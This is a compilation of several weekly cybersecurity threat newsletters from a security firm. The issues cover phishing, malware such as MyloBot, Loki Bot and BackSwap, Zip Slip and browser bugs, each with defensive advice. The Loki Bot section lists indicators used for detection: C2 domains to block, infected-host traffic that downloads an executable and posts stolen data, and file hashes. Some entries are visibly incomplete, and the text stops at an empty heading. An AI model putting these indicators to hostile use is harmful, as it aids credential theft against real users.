In this issue:

In this week’s issue, you’ll find information regarding the most current critical threats and preventative measures to lessen the chances of a breach.

• Gmail, and peeping third-party developers
• USB Restricted Mode issues
• “Alexa, pay my bills.”
• How can Netizen Help?

Gmail, and peeping third-party developers.

Given your current personal Gmail settings, third-party developers may be able to read your Google emails. While this may come as a surprise, third-party devs only have access because they are permitted by the end user. For certain applications to function they need access/permission to operate; the issue arises when said applications are unsecured or even malicious, causing a serious threat to privacy. Google responded by admitting that third-party developers are able to view a user’s email; however, they maintain that the only way the dev would be able to is by receiving permission from the user. While it is common to provide permissions among other email providers, the issue arises when not just personal information is involved, but corporate data and intel as well.

While this seems cut and dry, it can easily be overlooked as not everyone realizes that their Gmail accounts are permitted to be viewed by outside parties.

Recommendations

• Again, this sounds obvious, but do not conduct any company business with your personal email. This should be a standard of the organization.
• Stop using third-party apps. If not feasible, scrutinize the permissions of the application and limit its access as much as possible.
• Gmail Security Check-up can be utilized to see which third-party apps are connected to your account and what permissions have been granted. If you find an app that you do not want to have access, you can remove it accordingly.
• Make use of encrypted email services, and check your current email configurations (even the company’s) to see if there is any outside access given.

“Alexa, pay my bills.”

More and more uses of smart speakers – like Amazon Echo, Apple Siri, & Google Home – are making our lives more connected and perhaps more entertaining. Anyone who has ever enjoyed a science-fiction story where the hero starts a request with “Computer…. ´ has waited to do the same thing in their own home. Smart Speakers can create lists, play games, play media, send and receive audio and video communications, and even order goods and services. But should they also handle purely financial transactions as well?

American Express and Capital One are two credit card issuers who allow users to pay bills through their smart speaker, which poses a small risk to the consumer. But regional banks have introduced using a smart speaker to query account balance inquiries and mortgage and bill payments. While the risk of someone fraudulently paying your bills is minimal, the privacy of your account balances is something to be considered. Financial institutions may encourage a PIN to protect the account information, but if you are overheard speaking the PIN, it is hardly secure.

As advanced as these smart speakers have already become, there are many times when instructions or commands spoken to them are misheard. Should you request a payment to be sent to a friend or relative and the device mishears the name you speak, you may have a headache resolving the matter.

Most importantly, as with any connected device, the opportunity for a vulnerability to be uncovered can lead to a financial catastrophe. As using these devices for financial transactions is still new, the attention hackers pay to them is probably minimal. It won’t be long, however, before the bad guys look to exploit these devices in search of potentially draining your account.

Recommendations

• Evaluate your need for using a smart speaker to handle your financial data.
• Always use a strong password and PIN, and never use these on more than one online account.

USB Restricted Mode issues

Apple has recently released iOS 11.4.1 which includes a new security feature in order to protect your phone from malicious USB accessories that connect to its data port. This will make things harder for hackers to break into your device without your permission.
Called USB Restricted Mode, this feature automatically disables the data connection on your iPhone or iPad’s data port after the device has been locked for an hour or longer.

Security researchers, however, have found that connecting a USB accessory, such as lighting port to USB camera adapter to a recently locked device will reset the 1-hour countdown.

While the vulnerability is not extremely severe, it certainly could be a costly mistake if a user was expecting their data connection to be disabled but instead was still active due to using a USB accessory before the lockout window.

This feature comes amid a growing rate of Juice-jacking stations, which are malicious free charging stations setup by hackers in order to gain access to your device and steal personal and sensitive data.

Recommendations

• Keep your devices charged! When going out for a long time, ensure your device is charged completely. Make it a habit to charge your device when they are not in use.
• Avoid using public chargers, and if you must, ensure they are only an AC/DC charger and not a USB connection charger.
• Carry a power bank or charger, so if you must recharge you are doing so from a trusted source.
• Get a charge-only cable so that you can safely plug into public charging stations.

How Can Netizen Help?

Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.  We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

Netizen is an ISO 27001:2013 (Information Security Management) certified company.

 

In this issue:

In this week’s issue, you’ll find information regarding the most current critical threats and preventative measures to lessen the chances of a breach.

• IoT in the Workplace: Are you at risk?
• Fake OVERDUE INVOICES alert Malware disguised as billing notices
• Two-Factor Inauthentication–The Rise in SMS Phishing Attacks
• How can Netizen Help?

Cybersecurity Assurance TIPS

IoT in the Workplace

Are you at Risk?

As mobile and IoT devices become more and more important to the overall success of modern business, the inherent security vulnerabilities they bring to information technology infrastructures becomes more acute—and more dangerous. The enthusiastic, and somewhat reckless, embrace of BYOD mo- bile and IoT devices by so many businesses, all hoping to capitalize on em- ployee mobile productivity, may have far-reaching and costly security con- sequences for all of us.

According to Verizon’s Mobile Security Index 2018, only 14% of the re- sponding organizations said they had implemented even the most basic cy- bersecurity practices, with an astonishing 32% of these IT professionals ad- mitting that their organization sacrifices mobile security to improve busi- ness performance on a regular basis. That general lax attitude toward cy- bersecurity goes along way toward explaining why IoT attacks have spiked 600% in one year.

Businesses, regardless of size or technical sophistication, can’t afford to continue treating cybersecurity, especially with regard to IoT, as an after- thought. Besides the obvious costs of lost productivity from system down- time, there is a substantial potential for fines and penalties stemming from data loss and violation of privacy regulations. Whether you like it or not, cybersecurity must be a vital and integral part of your strategic plan.

Recommendation:

• Ensure any IoT installed in the workplace meet with the business’ System Security Plan for ‘BYOD’ devices.

Fake URGENT PAYMENT for overdue bills

Malware delivered in phony billing notice

An email with the subject of “FW: URGENT PAYMENT FOR OVERDUE IN- VOICES” pretending to come from FINANCE <salgar@dgkw.com> with both a malicious Word DOC and an Excel XLS spreadsheet attachment delivers the Formbook malware. The only real reason to mention this is the dual attachment so trying to get 2 bites at the cherry. They are using email ad- dresses and subjects that will scare or entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers.

Remember many email clients, especially on a mobile phone or tablet, only show the Name in the From: and not the bit in <domain.com>. That is why these scams and phishes work so well.

All the alleged senders, companies, names of employees, phone numbers, amounts, reference numbers etc. mentioned in the emails are all innocent and are just picked at random. Some of these companies will exist and some won’t. Don’t try to respond by phone or email, all you will do is end up with an innocent person or company who have had their details spoofed and picked at random from a long list that the bad guys have previously found. The bad guys choose companies, Government departments and other organizations with subjects that are designed to entice you or alarm you into blindly opening the attachment or clicking the link in the email to see what is happening.

Recommendation:

By default, protected view is enabled and macros are disabled, UNLESS you or your company have enabled them. If protected view mode is turned off and macros are enabled then opening this malicious word document will infect you, and simply previewing it in windows explorer or your email client might well be enough to infect you.

Two-Factor Inauthenticaiton

The Rise in SMS Phishing Attacks

As cyber criminals are constantly on the prowl to capture passwords and other credentials, two-factor authentication (2FA) has become one of the most widely accepted backup verifications for many services and compa- nies. Since nearly everyone has a mobile phone, the 2FA method most widely used is a code sent via SMS text message.

However, SMS is not entirely secure. Anyone with direct access to your cell phone can pretend to be you and have a code sent to your device. In fact, thieves do not need to have the device in their hands, as 2FA is also vulner- able to remote phishing. We most often think of phishing attacks as taking place over email, targeting information such as passwords, but the same tactic can very easily be applied over SMS and targeting reset codes. One particularly powerful technique is the Verification Code Forwarding Attack, or VCFA. For this approach, the criminal accesses a service provider and requests an SMS code to reset their password for a particular user. Immedi- ately afterwards, they send a fake text message to the same user, pretend- ing to be the service provider and asking for the code “as an additional veri- fication measure”.

In a research experiment conducted at New York University, it was discov- ered that the VCFA technique can be incredibly effective. 300 volunteers, who were not aware that the experiment involved SMS phishing, were sent a variety of different messages designed after real SMS from their email provider. The most successful message was able to fool 50 percent of recip- ients into giving up their authentication code, which is an impossibly high result for most forms of social engineering. By comparison, most non- targeted email-based phishing attacks have a success rate of around 1 per cent, with the very best reaching two or three percent.

Any service being breached in this way would mean severe repercussions for the victim, most obviously online payment, retail, and anything else con- nected to financial data. The holy grail for any attacker is to gain access to an email account, a tactic known Email Account Compromise (EAC).

While financial details can be exploited as a one-off opportunity before the bank takes action, an email account can be used in to cause much more damage.

While SMS remains so widespread and more attackers pick up on SMS phishing attacks, it is more important than ever for organizations to be aware that their workforce’s digital identities may be compromised.

Recommendation

• Adopt using a code-generating app such as Microsoft Authenticator on your mobile device

How can Netizen Help?

Netizen ensures that security gets built-in and not bolted-on. Providing ad- vanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of exec- utive-level cybersecurity professionals without having to bear the cost of employing them full time. We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compli- ance information for audiences ranging from IT professionals to executive managers.

Threats:

Listed below is information regarding this week’s most critical threats and preventative measures to lessen the chances of a breach:

1. MyloBot
2. WannaCry Extortion Fraud
3. Wavethrough
4. Stay Safe on Public Wi-Fi
5. ZeroFont

1. MyloBot

Overview

A new sophisticated malware dubbed MyloBot had been discovered with smart evasion, infection, and propagation techniques.

MyloBot behaviors include:

• Process hollowing; A legitimate process that is supposed to run on a computer is used as a container, or a host rather, for malicious code. This technique helps hide the malware.
• Reflective EXE; Loading executable files from memory into a host process.
• Code injection; Invalid data processing allows malicious code to be “injected” into a vulnerable computer to change a program’s intended outcome.
• Ransomware payload
• Data theft
• Anti-VM (Virtual Machine) capabilities
• Anti-sandbox capabilities; A sandbox is a form of testing environment for untested code. MyloBot circumnavigates this.
• Anti-debugging capabilities

A successful MyloBot infection allows attackers to gain full control of a victim’s machine. Full control would let the attacker add further damage, such as keyloggers (recording a user’s keyboard strokes), banking Trojans, and Distributed Denial of Services (DDoS) attacks. One last interesting ability of MyloBot, is that it actually seeks out and destroys any other malware on a system so that it could gain the most profit from the victim.

Recommendations

We recommend the following steps to help protect your organization from MyloBot:

• Ensure a multi-layered approach and protection for your systems to prevent, detect and remove threats from the gateway to the endpoints.
• Regularly back up your files. Practice the 3-2-1 system to minimize or mitigate data loss; the 3-2-1 system is when you have 3 copies of your data (1 production and 2 backup copies) on two different types of media with one off site copy for disaster recovery purposes.
• Employ data categorization (organizing data correctly and efficiently) and network segmentation (the guest network of the organization should not be able to talk to the company internal network).

2. WannaCry Extortion Fraud

Overview

Extortion emails are sent by hackers to try and threaten or intimidate users into paying money (often in Bitcoin), lest they face the wrath of the WannaCry ransomware. The extortion emails that have been circulating are designed to cause panic and state that all of the victim’s devices have been infected with WannaCry; this is in fact a fraud and actually just a phishing attempt. This “your computer is infected, pay us” approach is a classic in the social engineering realm and has been used for years.

Recommendations

While understandably scary, do not panic. More often than not, if you are infected with ransomware, you wouldn’t even be able to access anything; let alone your email. A prompt would surface on startup claiming the computer encrypted. To be on the lookout for this fraud, we recommend:

• Being skeptical of emails. Examine them closely, and do not click on any links or download attachments. If something does not seem right, it probably isn’t. Verify emails that pose as legitimate companies.
• Develop and execute a plan for end-user awareness on recognizing phishing emails. Last week’s threat brief was a good example of a phishing attempt.
• Perform routine updates and patches for antivirus solutions, software, applications, and operating systems as is best practice.

3. Wavethrough

Overview

A Google researcher has found a vulnerability in many modern browsers which could allow malicious websites to steal sensitive content from websites you are currently logged into on the same browser. By tricking the victim to play or view a malicious embedded media file, the browser is exploited into sending elements from other open tabs. These media elements could contain sensitive information or conversations that the victim may have open.

Recommendations

• Ensure browsers and applications are continually updated to ensure the latest security patches are in place.
• Be vigilant when browsing new or unknown websites, and refrain from playing and embedded media that you are suspicious of.
• Practice good browsing techniques and limit the simultaneous browsing of business and leisure pages to avoid cross-script exploitation.

4. Stay Safe on Public WiFi

Overview

Public Wi-Fi has become so accessible that many of us eagerly search for it and connect to open hubs without thinking.  Many are travelling in the warmer months, and often use hotel or other hotspots to stay connected.

However, connecting to public Wi-Fi could leave you exposed to cybercriminals that might keep tabs on your financial transactions, email correspondences or anything else you do online.

One of the most common methods of attack involves hackers tricking you into thinking you’re connected to a valid network — such as one operated by a hotel or coffee shop. In reality, hackers named the false network to make it seem legit to unsuspecting victims, then monitor individuals’ activities.

You can stay safer while connected to a public network by doing a few simple things every time you connect.

Recommendations

Don’t Store the Network Login Credentials

Computers can handily remember passwords and usernames required for public Wi-Fi access if you consent to use that feature. However, it’s best to disable that capability — usually by un-checking the Remember This Network box when logging in. You may also need to go into your computer’s settings and manually delete networks to make it forget Wi-Fi connections when you’re not using them.

Otherwise, your computer or mobile device could log in to networks without your knowledge. That typically happens whenever you’re in range of a previously used Wi-Fi network.

Avoid Connecting Workplace Devices

Sometimes instead of taking things from your computer, hackers install stuff onto it. Malware is one of the software-related risks associated with unsecured devices people use for work. The best practice is not to connect your workplace equipment to public hotspots at all. Then, hackers can’t infiltrate it to either steal data or add corrupt applications.

Only Visit Extra-Secure Sites or Take Part in Casual Browsing

Get in the habit of only going to websites that include the “https” prefix or offer two-factor authentication. Then, if a hacker does enter your system as you use a public network, it’s harder for them to obtain useful details.

Consider only using public Wi-Fi when doing things not of interest to cybercriminals — for example, checking the weather forecast or reading the news headlines. Don’t check your bank account or participate in online shopping.

5. ZeroFont

Overview

In recent attacks, cyber criminals have been leveraging small font sizes to bypass Office365 spam protection in order to send malicious phishing emails to users and companies. By setting the font size to ‘0’ they can leverage making the email look normal to the victim but confuse spam filters into not being able to filter certain words and allow these malicious emails to come through.

Recommendations

• Continue to be vigilant when opening emails, looking for spelling mistakes, or requests for sensitive information.
• Consider setting your email client to display emails as plain text as this will help filter out specially crafted emails that look to deter spam filters.
• Ensure users are continually educated on the dangers of phishing emails and what to look for when browsing their email.

Threats:

Listed below is information regarding this week’s most critical threats and preventative measures to lessen the chances of a breach:

1. Phishing Email
2. Vulnerable Cloud Containers
3. Sneaky Windows malware delivers adware
4. Invisimole
5. Firefox fixes critical buffer overflow

1. Phishing Email

Overview

Just recently, Netizen has received a phishing email depicted below:

From the looks of it, the email appears to be legitimately from Chase. However, further inspection of the link reveals suspicious details:

We can see that the link points to a website based out of Chile (as depicted by the .cl domain) and is not actually from Chase Bank.

Recommendations

A Phishing email will typically direct the user to visit a website where they are asked to update personal information, such as a password, credit card, social security, or bank account numbers, that the legitimate organization already has.

Here are our recommendations and tips on what to watch out for when it comes to suspicious emails:

• Scrutinize your emails before clicking anything. Did you order or ask for anything for which you’re expecting a confirmation? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
• Verify that the sender is actually from the company sending the message
• Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc. A legitimate company will never ask for PII via instant message or email—this is a huge red flag.
• Do not give out personal or company information.
• Review both signature and salutation.
• Do not click on attachments
• Do not click on unrecognized links. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place, such as HTTPS.
• Be wary of poor spelling, grammar, and formatting.
• Many phishing emails pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action or that is addressing you in a threatening manner should be questionable. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Staff Pay Raises 2018” may seem like something you really want to know about, but it could just be a ploy to plant malware on your system or steal your credentials.

2. Vulnerable Cloud Containers

Overview

As the cloud is developed and technologies progress further, so do the risks of using these services. Around 22,000 cloud containers and application programming interface (API) management systems have been found unprotected, or publicly available on the Internet. Containers are a form of Infrastructure-as-a-Service (IaaS) that offers operating system virtualization that is more efficient than typical hardware virtualization. The containers discovered had poorly configured resources, a lack of credentials, and the use of non-secure protocols. As a result of these poor practices and security measures, attackers would be able to remotely access company infrastructure to either install, remove, or encrypt any application that the organization may be using in the cloud.

Recommendations

We recommend the following mitigations:

• Secure containers with complex and strong passwords.
• Utilize secure protocols (SSL/TLS)
• Scan container images and registries to search for security flaws within them.
• Monitor data that flows in and out of containers to search for any suspicious activity.
• Encrypt data, when in transit and when at rest.
• Keep your systems up to date.
• Limit user access to administrative privileges to only those that need it.

3. Sneaky Windows Malware Delivers Adware

Overview

A newly uncovered form of stealthy and persistent malware is distributing adware to victims across the world while also allowing attackers to take screenshots of infected machines’ desktops. Discovered by researchers at Bitdefender, the malware has been named Zacinlo after the name of the final payload that’s delivered by the campaign which first appeared in 2012.

The vast majority of Zacinlo victims are in the US, with 90 percent of those infected running Microsoft Windows 10. There are also victims in other regions of the world, including Western Europe, China and India. A small percentage of victims are running Windows 7 or Windows 8.

What makes Zacinlo so unusual is how it is delivered by rootkit, a malicious form of software which can manipulate the operating system and any installed anti-malware in such a way to make the computer oblivious to the existence of the malware. Rootkit-based malware is complex and is therefore rare, accounting for less than one percent of all malware.

Once downloaded, the false application pretends to act as a VPN would, but does nothing but act as a delivery mechanism for the malware, which uses the rootkit as a means of downloading files and eventually delivering the final Zacinlo payload.

The main goal of Zacinlo is to deliver adware, displaying adverts developed by the attackers in webpages the user visits and to secretly click through to them to generate ad revenue. Popular browsers including Edge, Internet Explorer, Firefox, Chrome, Opera, and Safari can all be used to drive the adware.

Ironically, in order to ensure it can carry out its goal, the malware can also clean up any other adware the victim device may be infected with.

Zacinlo is extremely persistent, secretly going about its business until it is told to stop by those running the command and control server — but using the computer to generate ad fraud isn’t the only threat posed by the malware.

The malware is stealthy, but it can be detected if the system is scanned in safe mode.

Recommendations

• Never download attachments without knowing where they have originated.
• Alert your Information Security staff if you suspect advertisements are appearing on unusual sites

4. Invisimole

Overview

A recent discovery of a sophisticated cyber-espionage malware tool has been discovered by security researchers and dubbed Invisimole. This malware can allow attackers to turn ordinary PCs into full-fledged spying devices. Capable of turning on the microphone or video camera remotely on the compromised machine allowing the attacker to listen in on, and record conversations near the infected computer. In addition, the ability to take screenshots of applications running in the background, and even scanning nearby wireless networks to geolocate the victim has been noted as well.

Recommendations

• Ensure recent updates and patches are applied to the operating system, internet browsers, and any addon plugins.
• Remove old and outdated software that is no longer in use.
• Be vigilant when reading emails, and do not download and run attachments from suspicious emails.
• Ensure the use and frequent updating of firewalls, antivirus, and anti-malware technology.

5. Firefox Fixes Critical Buffer Overflow

Overview

Firefox fixes critical buffer overflow Mozilla announced a security advisory (MFSA2018-14) for its Firefox browser, noting that version 60.0.2 of both Firefox and Firefox Extended Support Release (ESR) as well as the legacy ESR (ESR 52.8.1) now have a fix for a critical-level buffer overflow vulnerability.

The buffer overflow bug occurs within Firefox’s implementation of the Skia library, an open-source graphics library that is used by almost all of the mainstream browsers.

Skia is used for rendering and rasterizing images and text, and Fratric found that an attacker could trigger a buffer overflow during the rasterization process if they use a malicious SVG image file with anti-aliasing turned off. The Mozilla advisory says this buffer overflow could result in “a potentially exploitable crash.”

The fixed versions of Firefox became available on 6 June, so if you’ve run your browser lately, the chances are it’s already patched.

Recommendations

• To be sure though, check to see what version of the browser you are running — in Firefox on Windows, go to Help and select About Firefox, on a Mac, Firefox and select About Firefox.

How can Netizen help?

Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.  We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

Threats:

Listed below is information regarding this week’s most critical threats and preventative measures to lessen the chances of a breach:

1. Zip Slip
2. Password Reset Flaw
3. Loki Bot Malware
4. MitM Chrome Extension
5. MyHeritage Breach

1. Zip Slip

Overview

Thousands of online projects may have been affected by a vulnerability known as Zip Slip. Attackers have discovered that they can create Zip archives that utilize a attack, which enables them to access files and directories that are stored outside the default folder. This attack allows the attacker to overwrite important files on affected systems, which can either destroy them or replace them with other malicious substitutes.

Zip Slip has been found on the following platforms:

• Java: It is very prevalent here because Java has no central library that offers high-level processing of archive files.
• JavaScript
• Ruby
• .NET
• Go

Attackers will target a site that will allow them to upload zip files, and then create malicious versions of the kinds of files that they would like to overwrite. It is even possible for an attacker to attach a zip file to an email, with the malicious file targeting a common location of a Windows desktop.

Recommendations

Like many software bugs, the usual fix is a simple patch. Below and libraries with known vulnerabilities on GitHub. Peruse the list and see if you are using any vulnerable software, as there are updates for most of them on the list. We also recommend that:

• Projects and libraries with known Zip Slip vulnerabilities https://github.com/snyk/zip-slip-vulnerability
• If you maintain software that unzips files automatically, you should test to see if it is vulnerable.
• Consider whether standard libraries would be a better option for your organization.
• Check to see if your applications are operating in accordance with the principle of least privilege.

2. Password Reset Flaw

Overview

Large cable and internet provider, , has a bug in the way they reset account passwords for their customers. The bug would allow anyone to take over a user’s account. An attacker with some determination and a few hours of their time would be able to take over a customer account with just a username and email address.

The attacker can bypass the access code sent during the reset process exploiting a small flaw; the access code field is not limited allowing for any number of attempts to try codes. Using an automated network intercept tool, the attacker could try as many as 100 codes in 10 seconds, eventually unlocking the account.

Recommendations

The service has since been shutdown and is likely to result in a patch. Once the patch becomes available, it is recommended to apply the fix as soon as possible. It is also recommended that different methods of multifactor authentication (MFA) are utilized. MFA can be a text message or even an application that either approves or denies a sign-in request.

3. Loki Bot Malware

Overview

Malware known as Loki Bot attempts to steal login credentials from infected users and sends the data and other sensitive material to a command and control (C2) server from an infected Windows host. Loki Bot is commonly distributed through malicious spam (malspam). The malware typically has an RTF attachment and is disguised as a Word document. When the file is opened, with a vulnerable version of Microsoft Office, the malware is then downloaded and Loki Bot is installed. Once installed Loki Bot steals usernames, passwords, and other sensitive data pertaining to the Windows Host.

Recommendations

The most effective aversion to this threat would be to make sure all updates and patches are implemented on your Windows system(s). Poor system upkeep seems to be the main opening that this threat needs in order to exploit a vulnerability. The following are also some indicators of the malware:

Indicators are not the same as a block list.  If you need to block the associated web traffic, block anything going to these two domains:

• com
• service-sbullet.com

Information from the malicious spam:

• Date: Sunday, 11 Jun 2018 01:05 UTC
• From: “Gold Link Logistics” <c37120b2324@fb90cfa11840.tr>
• Subject: Re: Aw: Aw: Shipping Documents
• Attachment Name: shipping documents.doc

Traffic from an infected Windows host:

• 163.221.2 TCP port 443 (HTTPS) – service-sbullet.com – GET /images/mg2/m.exe
• 122.138.6 TCP port 80 (HTTP) – oceanlinkmarrine.com – POST /loki4/fre.php

Associated malware:

SHA256 hash: b66d5b28c57517b8b7d2751e30e5175149479e5fde086b293a016aac11cdd546

• File size: 7,347 bytes
• File name: shipping documents.doc
• File description: RTF exploiting CVE-2017-11882 disguised as a Word document

SHA256 hash: a747eeac9ae8ee9317871dfaa2a368f2e82894f601a90614da5818f8f91d1d78

• File size: 667,648 bytes
• File location: hxxp://service-sbullet.com/images/mg2/m.exe
• File description: Windows executable file for Lokibot

System administrators can also implement Microsoft’s best practices when it comes to software restriction policies. https://docs.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies-technical-overview

4. MitM Chrome Extension

Overview

A malicious chrome extension known as Desbloquear Conteúdo (Unblock Content) targeted Brazilian online banking services. The goal of the malicious extensions is to accumulate stolen user logins and passwords, further allowing the attackers to steal money from the victims’ bank accounts. While most of our users are not in Brazil, the threat of malicious extensions are ever present globally.

This is not the first time that Chrome has been found with bad extensions wanting to steal user information and data (Nyoogle, Lite Bookmarks, Stickies, etc.). In fact, over 500,000 users were affected by the ones that were just mentioned, which is why it is incredibly important to be vigilant and careful of the extensions that you use.

Recommendations

Browser extensions designed to steal logins and passwords are more than feasible, and they should be taken seriously. We recommend discontinuing the use of such extensions if at all possible, however business needs may arise to which they are required. If you must use extensions:

• Have a good antivirus solution (like Symantec) that is up to date and can check for suspicious activity regarding newly installed extensions.
• Perform routine patches and updates. Often, malicious extensions require some sort of open vulnerability in a system to activate. Stay current.
• Only install verified extensions with large numbers of installations and reviews in the Chrome Web Store.
• Avoid third-party extensions as their validity cannot always be determined.

5. MyHeritage Breach

Overview

The breach was discovered when a security researcher found an archive on a third-party server containing the personal details of 92,283,889 MyHeritage users. The archive contained only emails and hashed passwords, but not payment card details or DNA test results. MyHeritage says it uses third-party payment processors for financial operations, meaning payment data was never stored on its systems, while DNA test results were saved on separate servers from the one that managed user accounts.

The company also promised to roll out a two-factor authentication (2FA) feature for user accounts, so even if the hacker manages to decrypt the hashed passwords, these would be useless without the second-step verification code.

It goes without saying that MyHeritage users should change their passwords as soon as possible.

The MyHeritage incident marks the biggest data breach of the year and the biggest leak since last year’s Equifax hack.

Recommendations

This breach is a reminder of the importance of using different passwords for every online account.  While the precise password for each account was not revealed, the hash could be reverse-engineer to discover the original password. Since the email address for the accounts was revealed, there is a chance an advisory could try password with the email on different sites, hoping to login successfully.

• MyHeritage is only now adopting two-factor authentication (2FA); users should always make use of this feature wherever possible.

How can Netizen help?

Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.  We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

Threats:

Listed below is information regarding this week’s most critical threats and preventative measures to lessen the chances of a breach:

1. Misconfigured Google Groups
2. Git Bug
3. Rental Car PII Risk
4. JScript Bug

1. Misconfigured Google Groups

Overview

Thousands of organizations have been discovered to be leaking sensitive data due to a widespread misconfiguration in Google Groups. Those afflicted include Fortune 500 companies, hospitals, colleges, newspapers, T.V stations, and even government agencies.

Google Groups is a web forum that allows administrators to create mailing lists for specific recipients, and they are able to adjust privacy settings in respect to domains and certain groups. This forum is made available online to users. Many groups are visible to the Internet, and the ability to share outside of the organization is left open.

Recommendations

While this is a misconfiguration issue, Google has not issued any special sort of update or patch. The following link should be used for admins to lock down their google groups: https://gsuiteupdates.googleblog.com/2018/06/configure-your-google-groups-settings.html

Permissions and outside access to users to should be limited within the scope of the organization and respective of how it conducts its business.

2. Git Bug

Overview

Popular git repository hosting services such as Github, GitLab, and MS VSTS were discovered to have two bugs that would allow an attacker to perform arbitrary code execution. An attacker would be able to gain access when a user, or developer, accesses a malicious repository. The more serious of the two is described as a submodule configuration flaw. These submodules can be malicious and directed to execute code. Submodules are used to reference from within a project in an almost hierarchical way. Essentially, submodules allow a developer to keep a Git repository as a subdirectory of another Git repository; letting you clone another repos into your project.

The main concern with the Git vulnerabilities is that a malicious or rogue submodule will trick the repository into running code that is out of its own context (code that it should not be running). This arbitrary execution could allow an attacker to exfiltrate data, pull down a web shell, plant a cryptominer, or even take complete control over the machine that the repository or clone is being run on.

Recommendations

While the aforementioned repository hosting services have patched the vulnerabilities, there are still some best practices to follow with git repos:

• A git repository cannot contain “..” as a path segment.
• Examine submodule folders more closely for flaws and inaccuracies.
• Submodule folders should not be symbolic links.

3. Rental Car PII Risk

Overview

Rental cars now pose a real threat to Personally Identifiable Information (PII). It is common for people to connect their smart phones to their car, either through Bluetooth or USB cable, to either play music, make a phone call, or charge their battery. This common habit, however, may result in the download and retention of your PII. The smart system within the car may store the cellphone number, your location data, and may also store call logs and contacts that have been previously dialed or texted.

Recommendations

Before returning your rental, we recommend the following to protect your PII:

• A USB connection may transfer data automatically, use a cigarette lighter adapter instead to power and charge devices.
• If your rental car is equipped, grant access to just the information you want to reveal by using the rental car’s permission screen.
• Delete your PII from the car’s system. There should be an option to remove your phone from the list of paired devices, which should wipe call logs and remove contacts.
• Remember to erase your location history from the car’s navigation system by entering the settings and clearing your driving record.
• Your rental car may have an option to clear all user data or do a factory reset. Talk to a staff member or check online before you drive away in your rental, you may forget or be in a hurry at the end of your trip.

4. JScript Bug

Overview

Microsoft’s custom implementation of JavaScript, known as JScript, can be exploited to allow an attacker to execute malicious remote code on a victim’s PC. Being that the vulnerability is within JScript, that means that the attacker must trick a user into accessing a malicious web page, or download and open a malicious JS file on the system; in this case, that is Windows Script Host (wscript.exe).

It should also be noted that this vulnerability does not lead to full system compromise. Further exploits would be required to advance exploitation however, information accessed on the right computer, like that of a CEO, could be disastrous for a company.

Recommendations

Microsoft is currently working on a patch, however, there are preventative measures that can be taken. We recommend discontinuing the use of applications that rely on JScript as feasible. This includes Internet Explorer, wscript.exe, etc. that process untrusted JS code or files. Users should also be aware of:

• Malicious email attachments
• Scrutinize your emails before clicking anything. Did you order or ask for anything for which you’re expecting a confirmation? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
• Verify that the sender is actually from the company sending the message
• Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc. A legitimate company will never ask for PII via instant message or email—this is a huge red flag.

How can Netizen help?

Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.  We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

Threats:

Listed below is information regarding this week’s most critical threats and preventative measures to lessen the chances of a breach:

1. BackSwap Trojan
2. Z-Shave

1. BackSwap Trojan

Overview

A stealthy banking malware known as the BackSwap Trojan is being utilized to empty victims bank accounts, right from their web browser. The success of this malware relies on its ability to remain undetected by security solutions. BackSwap uses abstains from the usual process injection for monitoring browser activity, and instead handles its malware processes by working with the Windows GUI elements and simulates user input.

BackSwap monitors the use of URLs and once it detects bank-specific activity, the malware then injects the malicious code; in this case, JavaScript. The code is either entered in the JavaScript console or right in the address bar. BackSwap is also able to circumnavigate several defenses and counters that are often implemented in browsers to prevent exploitation.

Recommendations

